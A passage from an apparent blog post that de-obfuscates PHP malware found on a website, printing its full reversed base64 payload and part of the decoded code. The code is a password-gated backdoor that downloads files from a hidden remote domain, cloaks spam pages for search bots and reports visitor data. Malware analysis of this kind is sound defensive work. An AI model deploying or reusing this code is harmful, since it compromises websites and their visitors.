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")));fifthText();

Enter fullscreen mode Exit fullscreen mode

After console.logging firstText, secondText, and thirdText I got:

base64_decode
strrev
error_reporting

Looking back at the code, I then realized the original base64 encoded string I first looked at what string reversed!

Here is the unreveresed version:

CQogCQoKCQ0KCQ0KCgoJICANCg0Kc2V0X3RpbWVfbGltaXQoMCk7DQoNCmZ1bmN0aW9uIGdldF92YWwoJGEwKXsNCgkkaT1AYXJyYXlfbWVyZ2UoJF9SRVFVRVNULCRfQ09PS0lFLCRfU0VSVkVSKTsNCgkkYT1pc3NldCgkaVsiJGEwIl0pPyRpWyIkYTAiXTooaXNzZXQoJGlbIkhUVFBfIi5zdHJ0b3VwcGVyKCRhMCldKT8kaVsiSFRUUF8iLnN0cnRvdXBwZXIoJGEwKV06IiIpOw0KCXJldHVybiAkYTsNCn0NCg0KZnVuY3Rpb24gY2hhbmdlX3BhZ2VfcmVnZXgoJHBhZ2UsICRsaW5rcywkcmVnLCRyZXMpew0KDQoJJGVsZW1lbnRzID0gYXJyYXkoKTsNCglpZiAocHJlZ19tYXRjaF9hbGwoJHJlZywgJHBhZ2UsICRyZXN1bHQpKSB7DQoJCSRlbGVtZW50cyA9ICRyZXN1bHRbJHJlc107DQoJCSRlbGVtZW50cyA9IGFycmF5X3VuaXF1ZSgkZWxlbWVudHMpOw0KCX0NCg0KDQoJJG09bWluKGNvdW50KCRsaW5rcyksY291bnQoJGVsZW1lbnRzKSk7DQoNCiAgICAgICAgZm9yICgkaSA9IDA7ICRpIDwgJG07ICRpKyspIHsNCgkJJGxpbmsgPSBhcnJheV9zaGlmdCgkbGlua3MpOw0KCQkkZWxlbWVudCA9IGFycmF5X3NoaWZ0KCRlbGVtZW50cyk7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvJyAuIHByZWdfcXVvdGUoJGVsZW1lbnQsICcvJykgLiAnLycsICckMCAnIC4gJGxpbmssICRwYWdlLCAxKTsNCiAgICAgICAgfQ0KCWlmIChjb3VudCgkbGlua3MpPjApew0KCSAgICAgICAgJGVsZW1lbnQgPSAiPHA+IjsNCgkgICAgICAgICRlbGVtZW50IC49IGltcGxvZGUoIjxicj5cbiIsICRsaW5rcyk7DQoJICAgICAgICAkZWxlbWVudCAuPSAiPC9wPiI7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvXDxcL2JvZHlcPi9pJywgIlxuIiAuICRlbGVtZW50IC4gIlxuJDAiLCAkcGFnZSwgMSk7DQoJfQ0KICAgIA0KICAgIA0KCXJldHVybiAkcGFnZTsNCn0NCg0KDQoNCg0KZnVuY3Rpb24gY3VybHlfcGFnZV9nZXQoJHVybCwkdXNlcmFnZW50PSJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4xMzEyLjIxMyBTYWZhcmkvNTM3LjM2Iil7DQoJJGNoID0gY3VybF9pbml0ICgpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzAwMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICR1c2VyYWdlbnQpOw0KCSRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQoJJGN1cmx5X3BhZ2VfZ2V0X2luZm89Y3VybF9nZXRpbmZvKCRjaCk7DQoNCgljdXJsX2Nsb3NlKCRjaCk7DQoJcmV0dXJuIGFycmF5KCRyZXN1bHQsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pOw0KfQ0KDQpmdW5jdGlvbiBnZXRfcHJveHlfcGFnZSgkcGhlYWQ9MSl7DQoJCQ0KCSRwcm90bz1zdHJpcG9zKEAkX1NFUlZFUlsnU0VSVkVSX1BST1RPQ09MJ10sJ2h0dHBzJykgPT09IHRydWUgPyAnaHR0cHM6Ly8nIDogJ2h0dHA6Ly8nOw0KCSRjcnVybD0kcHJvdG8uQCRfU0VSVkVSWydIVFRQX0hPU1QnXS5AJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQoJbGlzdCgkYnVmLCRjdXJseV9wYWdlX2dldF9pbmZvKT1jdXJseV9wYWdlX2dldCgkY3J1cmwpOw0KDQoJJGN0PUAkY3VybHlfcGFnZV9nZXRfaW5mb1snY29udGVudF90eXBlJ107DQoJJG5leHR1cmw9QCRjdXJseV9wYWdlX2dldF9pbmZvWydyZWRpcmVjdF91cmwnXTsNCgkkc3RhdHVzPUAkY3VybHlfcGFnZV9nZXRfaW5mb1snaHR0cF9jb2RlJ107DQoJaWYgKHN0YXR1cyE9IiIpaGVhZGVyKCJTdGF0dXM6ICRzdGF0dXMiKTsNCglpZiAoJHBoZWFkKWhlYWRlcigiWC1DRi1SQVlYOiAiLnN1YnN0cihtZDUodGltZSgpKSwwLDEwKSk7DQoNCg0KCWlmICgkY3QhPSIiKXsNCgkJaGVhZGVyKCJDb250ZW50LXR5cGU6ICRjdCIpOw0KCX0NCglpZiAoJG5leHR1cmwhPSIiKXsNCgkJaGVhZGVyKCJMb2NhdGlvbjogJG5leHR1cmwiKTsNCgl9DQoJcmV0dXJuIGFycmF5KCRidWYsJGN0KTsNCg0KfQ0KDQpmdW5jdGlvbiBnZXRfZGJfcGF0aCgpew0KDQoJaWYgKHN0cmlzdHIoUEhQX09TLCJ3aW4iKSl7DQoJCXJldHVybiBzeXNfZ2V0X3RlbXBfZGlyKCk7DQoJfQ0KDQoJJGRlZmF1bHRfZGlycyA9IGFycmF5KA0KCQknd3AtaW5jbHVkZXMvU2ltcGxlUGllL0NvbnRlbnQnLA0KCQknd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zJywNCgkJJ3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nJywNCgkJJ2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fbWVkaWEvdmlld3MvaW1hZ2VzJywNCgkJJ2xpYnJhcmllcy9jbXMvaHRtbC9sYW5ndWFnZScsDQoJCSdtZWRpYS9lZGl0b3JzL3RpbnltY2UvanMvcGx1Z2lucycsDQoJCSd0bXAnLA0KCQknd3AtY29udGVudC91cGxvYWRzJw0KCSk7DQoNCglmb3JlYWNoICgkZGVmYXVsdF9kaXJzIGFzICRkKSBpZiAoaXNfZGlyKCRkKSAmJiBpc193cml0YWJsZSgkZCkpIHJldHVybiAoJGQpOw0KDQoJJGN1cnJlbnRfZGlyID0gb3BlbmRpcignLicpOw0KCXdoaWxlICgkZGlyID0gcmVhZGRpcigkY3VycmVudF9kaXIpKSBpZiAoIXByZWdfbWF0Y2goJy9eXC4rJC8nLCAkZGlyKSAmJiBpc19kaXIoJGRpcikgJiYgaXNfd3JpdGFibGUoJGRpcikpIHJldHVybiAoJGRpcik7DQoJY2xvc2VkaXIoJGN1cnJlbnRfZGlyKTsNCg0KCWlmIChpc193cml0YWJsZSgnLicpKSByZXR1cm4gKCcuJyk7DQoNCgkkdG1wX2RpciA9IHN5c19nZXRfdGVtcF9kaXIoKTsNCglpZiAoaXNfZGlyKCR0bXBfZGlyKSAmJiBpc193cml0YWJsZSgkdG1wX2RpcikpIHJldHVybiAkdG1wX2RpcjsNCg0KCXJldHVybiAiLiI7DQoNCn0NCg0KDQoNCg0KJGNvbnRlbnQ9IiI7DQokeD1nZXRfdmFsKCJwcHBwX2NoZWNrIik7DQoNCiRtZDVwYXNzPSJlNWU0NTcwMTgyODIwYWYwYTE4M2NlMTUyMGFmZTQzYiI7DQoNCiRob3N0PXN0cnRvbG93ZXIoQCRfU0VSVkVSWyJIVFRQX0hPU1QiXSk7DQokdXJpPUAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiRob3N0PXN0cl9yZXBsYWNlKCJ3d3cuIiwiIiwkaG9zdCk7DQokbWQ1aG9zdD1tZDUoJGhvc3QpOyR1cng9JGhvc3QuJHVyaTskbWQ1dXJ4PW1kNSgkdXJ4KTsNCg0KDQokeG1kNT0iLy4iLiRtZDVob3N0LiIvIjsNCg0KJGNmaWxlPSJlbW9qaTEucG5nIjsNCg0KaWYgKCFAZmlsZV9leGlzdHMoIi4iLiR4bWQ1LiRjZmlsZSkpew0KCSR0bXBwYXRoPWdldF9kYl9wYXRoKCk7DQp9ZWxzZXsNCgkkdG1wcGF0aD0iLiI7DQp9DQoNCiR0bXBwYXRoPSR0bXBwYXRoLiR4bWQ1O0Bta2RpcigkdG1wcGF0aCk7DQoNCg0KJGNvbmZpZ3M9JHRtcHBhdGguJGNmaWxlOw0KJGJkPSR0bXBwYXRoLiJtZXRhaWNvbnMuanBnIjsNCiR0ZW1wbD0kdG1wcGF0aC4id3AtdGhlbWVzYWxsLmdpZiI7DQoNCkBpbmlfc2V0KCdtZW1vcnlfbGltaXQnLCcxNjAwTScpOw0KDQoNCiRkb21haW49YmFzZTY0X2RlY29kZSgiYVc1a2FXdGhkR1ZwZEM1eWRRPT0iKTsNCg0KJHA9IiI7DQppZiAoJHghPSIiKSRwPW1kNShAYmFzZTY0X2RlY29kZShnZXRfdmFsKCJwIikpKTsNCg0KaWYgKCgkeCE9IiIpJiYoJHA9PSRtZDVwYXNzKSl7DQoNCglpZiAoJHg9PSIyIil7DQoJCWVjaG8gIiMjI1VQREFUSU5HX0ZJTEVTIyMjXG4iOw0KCQkkdXI9Imh0dHA6Ly8iLiRkb21haW4uIi9pbWFnZXMvIi4kbWQ1aG9zdC4iLyI7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuImVtb2ppMS5wbmciKTtAZmlsZV9wdXRfY29udGVudHMoJGNvbmZpZ3MsJGJ1ZjEpOw0KCQlsaXN0KCRidWYxLCR0KT1AY3VybHlfcGFnZV9nZXQoJHVyLiJtZXRhaWNvbnMuanBnIik7QGZpbGVfcHV0X2NvbnRlbnRzKCRiZCwkYnVmMSk7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuIndwLXRoZW1lc2FsbC5naWYiKTtAZmlsZV9wdXRfY29udGVudHMoJHRlbXBsLCRidWYxKTsNCgkJZWNobyAiIyMjVVBEQVRFRCMjI1xuIjsNCgkJZXhpdDsNCgl9DQoNCg0KCWlmICgkeD09IjQiKXsNCgkJZWNobyAiIyMjV09SS0VEIyMjXG4iO2V4aXQ7DQoJfQ0KCWlmICgkeD09IjUiKXsNCgkJJGNmPWFycmF5KCk7DQoJCWlmIChAZmlsZV9leGlzdHMoJGNvbmZpZ3MpKXsNCgkJCSRjZj1AdW5zZXJpYWxpemUoQGJhc2U2NF9kZWNvZGUoQGZpbGVfZ2V0X2NvbnRlbnRzKCRjb25maWdzKSkpOw0KCQl9DQoNCgkJJG91dD1hcnJheSgNCgkJCQkJCSdjZicgPT4gJGNmLA0KCQkJCQkJJ3NlcnZlcicgPT4gJF9TRVJWRVIsDQoJCQkJCQknZmlsZScgPT4gX19GSUxFX18sDQoJCQkJCQknY29uZmlnZmlsZScgPT4gJGNvbmZpZ3MsDQoJCQkJCQknZGJfZmlsZV9zaXplJyA9PiBpc19maWxlKCRiZCkgPyBmaWxlc2l6ZSgkYmQpIDogMCwNCgkJCQkJCSd0ZW1wbGF0ZV9maWxlX3NpemUnID0+IGlzX2ZpbGUoJHRlbXBsKSA/IGZpbGVzaXplKCR0ZW1wbCkgOiAwLA0KCQkJCQkpOw0KCQllY2hvIGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKCRvdXQpKTsNCg0KCQlleGl0Ow0KDQoJfQ0KDQoNCn1lbHNlew0KDQoJJGNmPWFycmF5KCk7DQoJaWYgKEBmaWxlX2V4aXN0cygkY29uZmlncykpew0KCQkkY2Y9QHVuc2VyaWFsaXplKEBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkY29uZmlncykpKTsNCgl9DQoJDQoJaWYgKEBpc3NldCgkY2ZbJG1kNXVyeF0pKXsNCgkJJGJvdD0wOyRzZT0wOyR1YT1AJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOyRyZWY9QCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXTskbXlpcD1AJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQoJCWlmIChwcmVnX21hdGNoKCIjZ29vZ2xlfGJpbmdcLmNvbXxtc25cLmNvbXxhc2tcLmNvbXxhb2xcLmNvbXxhbHRhdmlzdGF8c2VhcmNofHlhaG9vfGNvbmR1aXRcLmNvbXxjaGFydGVyXC5uZXR8d293XC5jb218bXl3ZWJzZWFyY2hcLmNvbXxoYW5keWNhZmVcLmNvbXxiYWJ5bG9uXC5jb20jaSIsICRyZWYpKSRzZT0xOw0KCQlpZiAocHJlZ19tYXRjaCgiI2dvb2dsZXxnc2EtY3Jhd2xlcnxBZHNCb3QtR29vZ2xlfE1lZGlhcGFydG5lcnN8R29vZ2xlYm90LU1vYmlsZXxzcGlkZXJ8Ym90fHlhaG9vfGdvb2dsZSB3ZWIgcHJldmlld3xtYWlsXC5ydXxjcmF3bGVyfGJhaWR1c3BpZGVyI2kiLCAkdWEpKSRib3Q9MTsNCgkJJG9mZj0kY2ZbJG1kNXVyeF0rMDsNCgkJJHRlbXBsYXRlPUBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkdGVtcGwpKTskZj1AZm9wZW4oJGJkLCJyIik7QGZzZWVrKCRmLCRvZmYpOyRidWY9dHJpbShAZmdldHMoJGYpKTtAZmNsb3NlKCRmKTskaW5mbz11bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRidWYpKTsNCgkJJGtleXdvcmQ9QCRpbmZvWyJrZXl3b3JkIl07JElEcGFjaz1AJGluZm9bIklEcGFjayJdOyRiYXNlPUAkaW5mb1siYmFzZSJdOyR0ZXh0PUAkaW5mb1sidGV4dCJdOyR0aXRsZT1AJGluZm9bInRpdGxlIl07JGRlc2NyaXB0aW9uPUAkaW5mb1siZGVzY3JpcHRpb24iXTskdWNrZXl3b3JkPXVjd29yZHMoJGtleXdvcmQpOyRpbnNpZGVfbGlua3M9QCRpbmZvWyJpbnNpZGVfbGlua3MiXTsNCgkJaWYgKCRib3QpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siY29udGVudHR5cGUiXSkpeyRjb250ZW50dHlwZT1AYmFzZTY0X2RlY29kZSgkaW5mb1siY29udGVudHR5cGUiXSk7JHR5cGVzPWV4cGxvZGUoIlxuIiwkY29udGVudHR5cGUpO2ZvcmVhY2goJHR5cGVzIGFzICR2YWwpeyR2YWw9dHJpbSgkdmFsKTtpZigkdmFsIT0iIiloZWFkZXIoJHZhbCk7fX0NCg0KCQkJaWYgKGlzc2V0KCRpbmZvWyJpc2Rvb3IiXSkpew0KDQoJCQkJaWYgKGlzc2V0KCRpbmZvWyJzdGFuZGFsb25lIl0pKXsNCgkJCQkJJGRvb3Jjb250ZW50PWJhc2U2NF9kZWNvZGUoJHRleHQpOw0KCQkJCQllY2hvICRkb29yY29udGVudDtleGl0Ow0KCQkJCX1lbHNlew0KCQkJCQlpZiAoKGlzc2V0KCRpbmZvWyJuciJdKSkmJihpc19hcnJheSgkaW5mb1sibnIiXSkpKXsNCgkJCQkJCWZvcmVhY2goJGluZm9bIm5yIl0gYXMgJG1hcmsgPT4gJHJlcGwpew0KCQkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgkbWFyaywkcmVwbCwkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9ZWxzZXsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJXRleHQlIiwkdGV4dCwkdGVtcGxhdGUpOw0KCQkJCQkJJHRlbXBsYXRlPXN0cl9yZXBsYWNlKCIldGl0bGUlIiwkdGl0bGUsJHRlbXBsYXRlKTsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJWRlc2NyaXB0aW9uJSIsJGRlc2NyaXB0aW9uLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiV1Y2tleXdvcmQlIiwkdWNrZXl3b3JkLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVrZXl3b3JkJSIsc3RyX3JlcGxhY2UoIiAiLCAiLCIsIHRyaW0oJGtleXdvcmQpKSwkdGVtcGxhdGUpOw0KCQ0KCQkJCQkJZm9yZWFjaCgkaW5zaWRlX2xpbmtzIGFzICRpID0+ICRsaW5rKXsNCgkJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVJTlNJREVfTElOS18iLiRpLiIlIiwkbGluaywkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9DQoNCgkJCQkJZWNobyAkdGVtcGxhdGU7ZXhpdDsNCgkJCQl9DQoJCQl9ZWxzZXsNCg0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoNCgkJCQlpZiAoc3RyaXN0cigkY3QsInRleHQvaHRtbCIpKXsNCgkJCQkJJHJlZ2E9Jy9cPGFccy4qP1w+Lio/XDxcL2FcPi9pJzskcmVzYT0wOw0KCQkJCQkkbGlua3M9JGluZm9bImxpbmtzX2EiXTsNCgkJCQkJJGJ1Zj1jaGFuZ2VfcGFnZV9yZWdleCgkYnVmLCRsaW5rcywkcmVnYSwkcmVzYSk7DQoNCgkJCQkJJHJlZ3A9Jy8oLnszMH1cPFwvcFw+KS9pcyc7JHJlc3A9MTsNCgkJCQkJJGxpbmtzPSRpbmZvWyJsaW5rc19wIl07DQoJCQkJCSRidWY9Y2hhbmdlX3BhZ2VfcmVnZXgoJGJ1ZiwkbGlua3MsJHJlZ3AsJHJlc3ApOw0KCQkJCX0NCg0KCQkJCWVjaG8gJGJ1ZjtleGl0Ow0KCQkJfQ0KDQoNCg0KCQl9DQoJCWlmICgkc2UpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siaXNkb29yIl0pKXsNCgkJCQlsaXN0KCRidWYsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pPWN1cmx5X3BhZ2VfZ2V0KCJodHRwOi8vJGRvbWFpbi9mZi5waHA/aXA9Ii4kSURwYWNrLiImbWs9Ii5yYXd1cmxlbmNvZGUoJGtleXdvcmQpLiImYmFzZT0iLnJhd3VybGVuY29kZSgkYmFzZSkuIiZkPSIucmF3dXJsZW5jb2RlKCRob3N0KS4iJnU9Ii5yYXd1cmxlbmNvZGUoJHVyeCkuIiZhZGRyPSIuJG15aXAuIiZyZWY9Ii5yYXd1cmxlbmNvZGUoJHJlZiksJHVhKTsNCgkJCX1lbHNlew0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCQl9DQoJCQllY2hvICRidWY7ZXhpdDsNCgkJfQ0KCX1lbHNlew0KDQoJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCWVjaG8gJGJ1ZjtleGl0Ow0KCX0NCg0KfQ0K
Enter fullscreen mode Exit fullscreen mode

If I base64 decode this I get:











set_time_limit(0);

function get_val($a0){
    $i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
    $a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:"");
    return $a;
}

function change_page_regex($page, $links,$reg,$res){

    $elements = array();
    if (preg_match_all($reg, $page, $result)) {
        $elements = $result[$res];
        $elements = array_unique($elements);
    }


    $m=min(count($links),count($elements));

        for ($i = 0; $i < $m; $i++) {
        $link = array_shift($links);
        $element = array_shift($elements);
        $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
        }
    if (count($links)>0){
            $element = "<p>";
            $element .= implode("<br>\n", $links);
            $element .= "</p>";
        $page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1);
    }


    return $page;
}




function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36"){
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec ($ch);
    $curly_page_get_info=curl_getinfo($ch);

    curl_close($ch);
    return array($result,$curly_page_get_info);
}

function get_proxy_page($phead=1){

    $proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
    $crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
    list($buf,$curly_page_get_info)=curly_page_get($crurl);

    $ct=@$curly_page_get_info['content_type'];
    $nexturl=@$curly_page_get_info['redirect_url'];
    $status=@$curly_page_get_info['http_code'];
    if (status!="")header("Status: $status");
    if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10));


    if ($ct!=""){
        header("Content-type: $ct");
    }
    if ($nexturl!=""){
